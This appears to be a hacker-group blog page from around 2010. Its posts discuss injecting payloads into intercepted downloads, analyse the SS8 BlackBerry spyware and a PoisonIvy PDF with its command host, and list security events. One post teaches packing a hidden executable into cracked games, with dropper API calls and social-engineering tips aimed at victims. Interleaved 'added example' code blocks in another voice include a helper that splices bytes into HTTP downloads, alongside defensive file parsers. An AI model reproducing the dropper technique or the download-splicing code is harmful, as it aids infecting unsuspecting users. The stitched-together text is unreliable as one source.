SG Hackers
United Hackers of Singapore!
Mar 10th
I read a lot about MITM attacks to steal info, or right now to do SSL MITM attacks, but maybe I'm ignorant because maybe this was discussed long ago, but I was thinking of MITM to inject malicious data into the stream?
Is it possible to do a MITM, detect say an installer download or a Windows Update hotfix or update exe, then on-the-fly attach something at the end of the exe, or better still repack the whole exe into 2 exes to be dropped?
With something like Paros Proxy or even the tcpdump source code, it is possible, right? I've never tried this before, so things like: is there a TCP checksum? What about the reported file size, will the browser be confused? I've seen the browser download a file where the file size is unknown but it still knows when to complete the download. Damn, I need to know more about TCP/IP and HTTP.
With a proxy or even a WiFi access point, it should be, I think, easy to intercept a webpage, then modify the content and return it to the browser, but intercepting a file download and then repacking the file is, I think, a much trickier problem.
Something worth exploring.
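The framing questions in the post (TCP checksum, reported file size, downloads of unknown size) have concrete answers, so here is an added example that is not part of the original post. It assumes an HTTP-level proxy that terminates the TCP connection itself: in that position the proxy's own network stack emits fresh TCP checksums and sequence numbers, so only the HTTP framing has to be kept consistent. That framing is either a Content-Length header or chunked transfer-encoding (the "size unknown" case the post mentions, where the zero-length chunk tells the browser the download is complete). The function names and the sample responses are constructed for the example.

```python
# Added example, not code from the original post. Shows why appending bytes to an
# HTTP download does not confuse the browser as long as the framing is updated,
# and what a client would have to check (a digest or signature) to notice it.
# Note: if you rewrite packets on the wire instead of proxying (libpcap level),
# you also have to recompute the TCP checksum and shift sequence numbers for
# every byte you add; a terminating proxy gets that from its kernel for free.
import hashlib

CRLF = b"\r\n"


def _dechunk(body: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked body into plain bytes (trailers ignored)."""
    out = bytearray()
    pos = 0
    while True:
        end = body.index(CRLF, pos)
        size = int(body[pos:end].split(b";", 1)[0], 16)  # drop chunk extensions
        pos = end + 2
        if size == 0:
            return bytes(out)                            # last-chunk marker
        out += body[pos:pos + size]
        pos += size + 2                                  # chunk data + CRLF


def parse_response(raw: bytes):
    """Split a raw HTTP/1.x response into (status_line, [(name, value)], body)."""
    head, sep, body = raw.partition(CRLF + CRLF)
    if not sep:
        raise ValueError("incomplete response head")
    lines = head.split(CRLF)
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def _is_chunked(headers) -> bool:
    return any(n.lower() == b"transfer-encoding" and b"chunked" in v.lower()
               for n, v in headers)


def decoded_body(raw: bytes) -> bytes:
    """The bytes the client will write to disk, with chunking removed."""
    _, headers, body = parse_response(raw)
    return _dechunk(body) if _is_chunked(headers) else body


def splice_suffix(raw: bytes, suffix: bytes) -> bytes:
    """Return `raw` with `suffix` appended to the body and framing made consistent.

    Content-Length is recomputed; a chunked body is de-chunked and re-emitted
    with an explicit length, so the browser sees one well-formed response.
    """
    status, headers, body = parse_response(raw)
    if _is_chunked(headers):
        body = _dechunk(body)
    new_body = body + suffix
    kept = [(n, v) for n, v in headers
            if n.lower() not in (b"content-length", b"transfer-encoding")]
    kept.append((b"Content-Length", str(len(new_body)).encode()))
    head = CRLF.join([status] + [n + b": " + v for n, v in kept])
    return head + CRLF + CRLF + new_body


def body_sha256(raw: bytes) -> str:
    """What a client comparing against a published digest would actually check;
    an appended payload changes this even though the HTTP framing stays valid."""
    return hashlib.sha256(decoded_body(raw)).hexdigest()
```

The defensive corollary is the part worth remembering: a correct Content-Length is all the browser verifies, so the only things that catch a spliced download are a digest fetched over a separate trusted channel, a code signature on the file (Windows Update and most installers carry one), or TLS on the download itself.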
Mar 10th
Design21 is hosting a game design contest to encourage positive change in people’s lives. Prize money of $2k to be won. Application closes May 11.
—
Game Changers
Design a game that aims to create change by improving lives or inspiring new behaviors.
“The goal of this competition is to come up with the idea and design for a game that can improve lives or inspire new behaviors, whether personally, professionally or communally, to create change. The game could teach an individual or a group new life skills or propose a more sustainable way of living, working or interacting either at home or in our community. It does not have to operate on a grand scale. Small is also welcome. The objective and spirit of the game should be to inspire or create positive change.”
Mar 1st
Earlier I wrote about the Mobile Secrets Java app and how its secrets were easily revealed via bytecode disassembly. Well, I recently got wind of an even bigger Java app exposé: the SS8 BlackBerry trojan that the UAE deployed last year and caused a big hoo-ha because it got exposed!
I only managed to get the Java package last week, so I'm still running through the code, but it's old news to others already. The tech websites have already talked about it; it seems to be a demo/early version with a lot of loopholes or missing features. You can read this PDF for an overview.
The key points I extracted for your easy reading! Very interesting and sad… battery drain, LOL! I wonder whether the mobile data bill can be refunded or not…
OBSERVATIONS
There are several anomalies in the application that lead to the conclusion that it was either not the version intended for deployment; it was mistakenly rolled out or it was an early release that was being tested.
The reasons for such a conclusion can be argued as:
(1) No capability for intercepting incoming messages.
(2) No possibility of silently updating the application with newer releases.
(3) Lack of comprehensive interception capabilities. Only outgoing email messages.
(4) Several segments of unused source code and references that have been hardcoded into the application. Further observations have been listed below.
Disabled Email Control Channel
The email based control channel to send commands to the application is disabled. On further analysis, why it was disabled became clear. When the service-provider sends an email message to activate the application, a copy of this control email would also be delivered to the recipient’s email server. Thus the user would be alerted to possible suspicious activity.
Control Channel Messages
Control channel commands are momentarily visible when they are received. Thus a user who happens to be looking at his handheld screen would see a message appear for a fraction of a second and then instantly disappear. This behavior was observed on a BlackBerry handheld but was not apparent on the BlackBerry handheld simulator.
Hardcoded References
A standard program that is redistributed will usually have some sort of constants or configuration file. The Interceptor application did contain such a file; however, the configuration parameters from the file were not used in the execution of the program. Instead, there were hardcoded references that were used. This is what led to the conclusion that this version of the application was either an early testing version that was mistakenly deployed or it was a badly modified version of an original file.
Battery Drain
The application implements a watcher on all the handheld message folders. This watcher triggers other components whenever a message is received. Despite this, the application polls a function to check if a new message has been received. This constant polling uses processing cycles and thus increases power consumption. It is very likely that less powerful processors may overheat due to the increased processing activity. This is bad programming practice, especially for handheld devices. It was also the reason users were made suspicious of the program.
Heartbeat
Every hour, each handheld will report its status and version information to the central server. This happens regardless of whether the application is intercepting messages or not.
Encryption
The Interceptor application makes use of encryption when sending intercepted messages or receiving control commands. It does this by encrypting outgoing messages using AES. The keys are hardcoded into the application. For incoming control commands, the messages are decrypted using the device PIN as the decryption key. The encryption type is still AES.
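Both the "Hardcoded References" and "Encryption" observations above, and the earlier point about secrets falling out of bytecode disassembly, come down to one fact: anything a Java program hardcodes (hosts, URLs, AES keys) is a string constant in the class file's constant pool, readable without running or even fully disassembling the code. The following is an added example, not the SS8 application's code nor anything from the quoted report. It walks the constant pool of a .class file and buckets the strings an analyst looks for first. The sample class bytes are constructed for the example (header plus constant pool only, which is all the parser reads), and the host, URL and key values in it are placeholders, not real indicators.

```python
# Added example, not from the original post or the SS8 report: extract every
# string constant from a Java class file by walking its constant pool, then
# flag the ones that look like hosts, URLs or raw hex keys.
import re
import struct

# Tag -> payload size for the fixed-size constant pool entries (JVM spec, 4.4).
# Utf8 (tag 1) is variable length; Long (5) and Double (6) take two index slots.
_FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
          12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}


def constant_pool_strings(data: bytes) -> list:
    """Return all CONSTANT_Utf8 entries of a class file, in pool order."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a Java class file")
    (count,) = struct.unpack(">H", data[8:10])   # constant_pool_count
    pos, index, out = 10, 1, []
    while index < count:
        tag = data[pos]
        pos += 1
        if tag == 1:
            (length,) = struct.unpack(">H", data[pos:pos + 2])
            pos += 2
            out.append(data[pos:pos + length].decode("utf-8", "replace"))
            pos += length
        elif tag in _FIXED:
            pos += _FIXED[tag]
        else:
            raise ValueError("unknown constant pool tag %d at offset %d" % (tag, pos - 1))
        index += 2 if tag in (5, 6) else 1
    return out


# Heuristics: lower-case dotted names look like hosts (Java class names in dotted
# form usually carry a capital, so they fall through); 32/48/64 hex chars are
# AES-128/192/256 key sizes written out as text.
_URL = re.compile(r"^https?://", re.I)
_HOST = re.compile(r"^(?=.{4,253}$)[a-z0-9-]+(\.[a-z0-9-]+)+$")
_HEXKEY = re.compile(r"^(?:[0-9a-f]{32}|[0-9a-f]{48}|[0-9a-f]{64})$", re.I)


def classify(strings) -> dict:
    hits = {"urls": [], "hosts": [], "hex_keys": []}
    for s in strings:
        if _URL.match(s):
            hits["urls"].append(s)
        elif _HOST.match(s):
            hits["hosts"].append(s)
        elif _HEXKEY.match(s):
            hits["hex_keys"].append(s)
    return hits


def _utf8(s: str) -> bytes:
    b = s.encode()
    return b"\x01" + struct.pack(">H", len(b)) + b


# Constructed class-file fragment for the demo (magic, version, constant pool).
# The parser never reads past the pool, so the rest of the class is omitted.
SAMPLE_CLASS = (
    b"\xca\xfe\xba\xbe" + b"\x00\x00\x00\x31"          # magic, minor 0, major 49
    + struct.pack(">H", 10)                              # count = entries + 1
    + _utf8("java/lang/Object")                          # #1 Utf8
    + b"\x07" + struct.pack(">H", 1)                     # #2 Class -> #1
    + _utf8("c2.example.net")                            # #3 Utf8 (placeholder host)
    + b"\x08" + struct.pack(">H", 3)                     # #4 String -> #3
    + b"\x05" + struct.pack(">q", 3600000)               # #5-#6 Long (one hour in ms)
    + _utf8("000102030405060708090a0b0c0d0e0f")          # #7 Utf8 (placeholder key)
    + b"\x03" + struct.pack(">i", 8080)                  # #8 Integer
    + _utf8("https://c2.example.net/report")             # #9 Utf8 (placeholder URL)
)
```

Run it over every class in the JAR (unzip, then feed each .class to constant_pool_strings) and the "hardcoded references" the report describes come out as a short list. The key caveat on the "Encryption" point: a key the application embeds is recoverable by exactly this walk, and a key derived only from the device PIN (an 8-hex-digit identifier) has at most 32 bits of entropy, so neither direction of that channel is protected against anyone holding the binary.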
Feb 23rd
Hack In The Box has revived their magazine and released the first issue last month:
https://www.hackinthebox.org/misc/HITB-Ezine-Issue-001.pdf
Other than that, they also released a special report on last year's CTF:
https://www.hackinthebox.org/misc/HITB-CTF2009-Special-Report.pdf
Feb 23rd
Singapore PoisonIvy C&C!
We saw a pretty PDF file today (md5: 116d92f036f68d325068f3c7bbf1d535). It looks like this:
Nice flowers.
Unfortunately, when viewing the file, it uses an exploit against Adobe Reader and drops and runs a file called 1.exe.
This executable is a Poison Ivy backdoor. It calls home to a host called cecon.flower-show.org. Whoever controls the computer at that address gains remote access to the target computer. The PDF was used in a targeted espionage attack against an unknown target.
We’ve seen the domain flower-show.org before, already in 2009. Then another PDF called home to posere.flower-show.org.
Today, both of those host names resolve to 202.150.213.12, which is not in China. It’s in Singapore.
http://www.f-secure.com/weblog/archives/00001878.html
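The F-Secure write-up describes the usual shape of a targeted PDF: an action that runs on open, script or launch content that triggers a reader exploit, and a dropped executable. Static triage for that shape is a first pass over the names the document uses, in the style of the pdfid tool. The following is an added example, not F-Secure's tooling, and it makes no claim about the specific file above (its MD5 is all the page gives). It undoes the #xx name escaping (/J#61vaScript for /JavaScript) that droppers use to hide from a naive grep. The two sample documents are constructed for the example.

```python
# Added example, not from F-Secure or the original post: count the PDF names
# that an exploit document needs in order to run code when opened, after
# normalising #xx escaped names, and turn the counts into a coarse verdict.
import re
from collections import Counter

SUSPICIOUS = ("/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch",
              "/EmbeddedFile", "/RichMedia", "/ObjStm")

# A PDF name token: '/' followed by regular characters (no whitespace or delimiters).
_NAME = re.compile(rb"/(?:[^\s/<>\[\]()%]+)")


def _unescape_name(tok: bytes) -> bytes:
    """/J#61vaScript -> /JavaScript (PDF 1.2 name escaping)."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), tok)


def pdf_name_counts(data: bytes) -> dict:
    counts = Counter()
    for m in _NAME.finditer(data):
        name = _unescape_name(m.group(0)).decode("latin-1")
        if name in SUSPICIOUS:
            counts[name] += 1
    return dict(counts)


def triage(data: bytes) -> dict:
    """'suspicious' when something runs on open AND there is code to run;
    'review' when only one of the two is present; 'clean' otherwise."""
    counts = pdf_name_counts(data)
    auto_run = any(counts.get(k) for k in ("/OpenAction", "/AA"))
    code = any(counts.get(k) for k in ("/JavaScript", "/JS", "/Launch", "/RichMedia"))
    if auto_run and code:
        verdict = "suspicious"
    elif auto_run or code:
        verdict = "review"
    else:
        verdict = "clean"
    return {"counts": counts, "auto_run": auto_run, "code": code, "verdict": verdict}


# Constructed samples (not real files): one with an escaped /JavaScript action
# wired to /OpenAction, one plain document.
SAMPLE_PDF = (b"%PDF-1.4\n"
              b"1 0 obj<</Type/Catalog/Pages 2 0 R/OpenAction 3 0 R>>endobj\n"
              b"3 0 obj<</S/J#61vaScript/JS(app.alert(1))>>endobj\n"
              b"trailer<</Root 1 0 R>>\n%%EOF")
CLEAN_PDF = b"%PDF-1.4\n1 0 obj<</Type/Catalog/Pages 2 0 R>>endobj\n%%EOF"
```

Two caveats a practitioner should keep in mind: names inside a compressed stream (FlateDecode) or an object stream are invisible to this scan until the streams are inflated, which is why /ObjStm is itself on the list as a prompt to look deeper; and a verdict of "clean" from a keyword count is a reason to inflate streams and look again, not a clearance.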
Feb 23rd

The 2nd All ‘Bout Security & Connectivity Seminar is here again at Temasek Polytechnic! This seminar provides a knowledge-sharing platform for IT security and network professionals and students.
The seminar includes talks on IT security and connectivity and a Web Challenge (supported by HITB), which is open to public. The aim of the challenge is to test the contestants on various web penetration techniques.

What’s on in 2010?
This year, the All Bout Security Seminar (5 March 2010) will include an additional seminar series on Connectivity, as well as a Web Challenge (supported by HITB).
Event Details:
Date: March 05 2010
Venue: Temasek Polytechnic Auditorium 1
Time: 12pm – 6pm
Programme List: All ‘Bout Security & Connectivity Seminar:
| Time | Topic | Speaker | Organization |
|---|---|---|---|
| 12:00 – 13:00 | Registrations and Project Showcase | - | - |
| 13:00 – 13:15 | Opening of All ‘Bout Security & Connectivity Seminar 2010 | - | - |
| 13:15 – 13:45 | Anatomy of a Security Breach | Unmesh Deshmukh | Symantec Corporation |
| 13:45 – 14:15 | The future of IT Security in Singapore | Michelle Lee | Singapore Infocomm Technology Security Authority |
| 14:15 – 14:45 | Life After WPA | Yap Chern Nam | Institute of Electrical & Electronics Engineers |
| 14:45 – 15:15 | The Art & Science of Hunting Down Wireless Hackers | Julian Ho | ThinkSECURE Pte Ltd |
| 15:15 – 15:45 | Refreshments Break & Project Showcase | - | - |
| 15:45 – 16:15 | Hosted Security: complete protection with a peace of mind | Leonard Sim | Symantec Asia Pte Ltd |
| 16:15 – 16:45 | Wireless LAN 802.11n Technology and Trends | Wee Keng Tong | Aruba Networks |
| 16:45 – 17:15 | Measuring Security Risks with CVSS | Eugene Teo | Red Hat |
| 17:15 – 17:45 | Biometrics: From Yesterday to Tomorrow | Lim Eyung | Biometrics Technical Committee of Singapore |
Programme List: Web Challenge (Supported by HITB)
10:00am – 11:00am – Briefing
11:00am – 1:30pm – Play Time
1:30pm – 3:00pm – Lunch & Break
3:00pm – 5:30pm – Challenge Rounds
5:30pm – 6:00pm – Computation of Results
6:00pm – 6:15pm – Announcement of results & Prize Presentation
Web Challenge Details:
Date: March 05 2010
Venue: Temasek Polytechnic Foyer area outside Auditorium
Time: 10am – 6pm
About
The Web Challenge will be organized by the Diploma in Cyber & Digital Security and supported by Hack In The Box (HITB). The Web Challenge aims to be a platform for all to showcase their web penetration testing skills against corporate emulated websites.
Competition Structure
Each participant has a maximum of 20 minutes to complete 4 out of 10 challenges. Upon completion of each level, a separate scoring mechanism will assign the participants a score based on a time-mission scheme (i.e. the faster you complete the levels, the higher your score will be). The challenges will test the contestants on various web penetration techniques including XSS, SQL Injection, Remote File Inclusion, etc.
Who can participate?
This competition will be open to the public.
Prizes
1st – iPod Touch 8GB & Free seat to HITBSecConf2010 – Malaysia (October 2010)
2nd – iPod Shuffle 4GB & Free seat to HITBSecConf2010 – Malaysia (October 2010)
3rd – Free seat to HITBSecConf2010 – Malaysia (October 2010)
Feb 23rd
The site is back up! After weeks of downtime it’s mysteriously up without any word from the webhost? An email from the webhost said that the server died due to hardware failure and, since it was brought back up, there have been issues with the webserver, most likely data corruption.
The server kept returning PHP files without rendering them, a MIME type problem it seems. How it happened and why it took so long to fix, your guess is as good as mine.
Dec 11th
Cool WinMo app to share: HushSMS is freeware that allows you to send all kinds of SMS messages to people, including invisible messages! I found out about this from Blackhat Europe 2009, from the talk on hijacking mobile communications using WAP Push.

Using HushSMS you can even send spoofed SMSes and MMSes to your friends for fun =]
Dec 2nd
My friend asked me how viruses can be spread from cracked game exes, since he plays DotA on a pirated Warcraft install on a private network. After I explained it to him, he asked why I had never blogged about it. What a good question! So today I will blog about some basic methods of packing a second executable into a program. I will describe 4 different ways to pack files.
The first is packing using resource files, one of the easier ways. In VC++ you can create/import resource files into your VC++ project. That is the easy part. The next part is slightly trickier: you need to extract the resource into a file on the system and then execute it. To do that you run the following calls:
hRes     = FindResource(hModule, MAKEINTRESOURCE(IDR_PAYLOAD), RT_RCDATA); // IDR_PAYLOAD: the resource ID you chose (illustrative name)
hResLoad = LoadResource(hModule, hRes);
pData    = LockResource(hResLoad);          // pointer to the embedded bytes
cbData   = SizeofResource(hModule, hRes);   // their length
hFile    = CreateFile(path, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
WriteFile(hFile, pData, cbData, &written, NULL);
CloseHandle(hFile);
With the file written, you just call WinExec (or CreateProcess) on it =)
The 2nd method is similar, but does not use resource files, which are easy to spot with a resource viewer. It requires more work on your part. Basically you need a 2nd program to convert the binary data into a string format which you can paste into your VC++ code as an array or string variable. I won't post code for this because there are many ways, e.g. read 1024 bytes at a time, Base64 them and print to an output file, or convert to a binary-coded string and then Base64 it, etc. The bottom line is: convert the binary data to a string, then have your code reverse it. One note: Base64 pads a short final group with "=" characters; the decoder has to handle that padding (or you strip it consistently on both sides), otherwise the last bytes of the binary come out corrupt. Exploit code uses the same trick to carry shellcode as a string or byte array.
The 3rd and 4th ways just use existing tools. One is InstallShield. Yes, InstallShield. It gives you a very nice GUI to add files, and even to choose which file to execute after unpacking. What you need, though, is an original package that used InstallShield; then rebuild the package yourself, except you add in your own files. Simple, right?
The 4th way is like the 3rd, but you might not have InstallShield, because later versions of VC++ don't bundle it for free. But you have WinZip, 7-Zip or WinRAR, right? All of them can create self-extracting archives (SFX). An SFX is the unarchiver stub with the archive (e.g. a ZIP) appended to it; the stub treats its own exe file as the archive. You can still open an SFX exe with the archiver tool, so it's not ideal: if you created the SFX with WinZip, anyone can open the SFX exe in WinZip and see the contents. Which is still not too bad if you had the original SFX and just re-SFXed it.
You can combine the 1st/2nd techniques with the 3rd/4th, but you need to know how to use Resource Hacker or a similar tool. The neat thing about the 3rd/4th techniques is that with social engineering they might work better, since your victim may think that because it came from InstallShield or WinZip it is safe =)
There are more advanced techniques, e.g. unpacking directly to memory, or using eggdrop instead of unpacking, but I won't discuss them today =)
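All four methods above leave the same trace: a second PE image carried inside or behind the first, whether as a resource, a byte array in .rdata, an InstallShield payload or the archive appended to an SFX stub. The following is an added example, not the post's VC++ code, and it shows both sides: bin_to_c_array() is the kind of converter the 2nd method needs (binary to a C byte array, with no Base64 padding to get wrong), and find_embedded_pe() plus overlay() are the checks that find a stuffed executable, by validating every "MZ" against the e_lfanew link to the "PE\0\0" signature and by computing where the last section's raw data ends. The _fake_pe() builder constructs minimal PE-shaped blobs for the demo; they are parseable, not loadable, and exist only so the example runs offline.

```python
# Added example, not from the original post: how a second exe is carried as a
# C byte array (method 2) and how to detect any carried PE, whether embedded
# in a resource/string table or appended after the last section (the overlay).
import struct


def bin_to_c_array(name: str, data: bytes, width: int = 12) -> str:
    """Emit a C definition holding `data` verbatim (no encoding, no padding)."""
    rows = []
    for i in range(0, len(data), width):
        rows.append("    " + ", ".join("0x%02x" % b for b in data[i:i + width]) + ",")
    return ("static const unsigned char %s[%d] = {\n%s\n};\n"
            % (name, len(data), "\n".join(rows)))


def find_embedded_pe(data: bytes) -> list:
    """Offsets of every well-formed PE image in `data`, outermost first.

    A PE starts with 'MZ'; the DWORD at +0x3c (e_lfanew) points at 'PE\\0\\0'.
    Requiring that link to hold filters out random 'MZ' byte pairs.
    """
    found = []
    off = data.find(b"MZ")
    while off >= 0:
        if off + 0x40 <= len(data):
            (e_lfanew,) = struct.unpack_from("<I", data, off + 0x3c)
            sig = off + e_lfanew
            if 0x40 <= e_lfanew < 0x1000 and data[sig:sig + 4] == b"PE\x00\x00":
                found.append(off)
        off = data.find(b"MZ", off + 1)
    return found


def image_end(data: bytes, base: int = 0) -> int:
    """Offset just past the last section's raw data: where the overlay begins."""
    (e_lfanew,) = struct.unpack_from("<I", data, base + 0x3c)
    pe = base + e_lfanew
    (nsec,) = struct.unpack_from("<H", data, pe + 6)        # COFF NumberOfSections
    (opt_size,) = struct.unpack_from("<H", data, pe + 20)   # SizeOfOptionalHeader
    sect = pe + 24 + opt_size                               # section table start
    end = sect + 40 * nsec                                  # headers at minimum
    for i in range(nsec):
        raw_size, raw_ptr = struct.unpack_from("<II", data, sect + 40 * i + 16)
        end = max(end, raw_ptr + raw_size)
    return end


def overlay(data: bytes) -> bytes:
    """Bytes appended after the image proper; an SFX archive or a stuffed exe lives here."""
    return data[image_end(data):]


def _fake_pe(section_data: bytes) -> bytes:
    """Constructed minimal PE-shaped blob for the demo: DOS header, PE signature,
    COFF header with one section and no optional header. Parseable, not loadable."""
    e_lfanew = 0x40
    raw_ptr = (e_lfanew + 4 + 20 + 40 + 0xF) & ~0xF        # 16-aligned data start
    dos = b"MZ" + b"\0" * (0x3c - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14c, 1, 0, 0, 0, 0, 0x102)
    section = (b".text\0\0\0"
               + struct.pack("<IIII", len(section_data), 0x1000, len(section_data), raw_ptr)
               + b"\0" * 16)
    blob = dos + b"PE\0\0" + coff + section
    return blob + b"\0" * (raw_ptr - len(blob)) + section_data
```

On a real file, a second offset from find_embedded_pe() inside the image means a resource or data-section payload (method 1 or 2); a non-empty overlay() that itself parses as a PE or as a ZIP/RAR/7z archive means method 3 or 4. Neither check cares whether the outer stub came from InstallShield or WinZip, which is the point: the social-engineering angle in the post does not survive a look at the bytes.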
Nov 30th
Like in previous years, a bunch of console hackers are getting together at 26C3. We hope to have some table space at the Hackcenter to set up our consoles, show off our hacks, and teach people about them!
The topic extends to many aspects of video game consoles, both software and hardware. This includes breaking the security, using homebrew software, modifying their existing software, hardware modifications and improvements, using custom hardware peripherals with consoles, using console peripherals with custom hardware, and anything else that’s related to video game consoles. A lot of what goes on behind the scenes only happens once or twice, so here’s your chance to learn what it really means to hack a game console, hands-on.
We’ve pretty much conquered the Wii since last year and are currently looking on to the Nintendo DSi and the PlayStation 3. If you always wanted to learn how the Wii’s security was broken using a pair of tweezers, or how to reverse engineer the Wii Remote’s extension encryption and make your own, you might want to stop by and say hi.
Also the WiiPhonies team is looking forward to having lots of fun at the CTF event again this year!
Equipment:
* Xbox 360
* Wii
* PS3
* DSi
* Soldering equipment, scope, logic analyzer, FPGA boards
Console hacking! I think a trip down’s worth it just for this! Is my PS3 safe after this? Or are we looking at the first PS3 modchip? Only time will tell =] Anyone going to 26C3?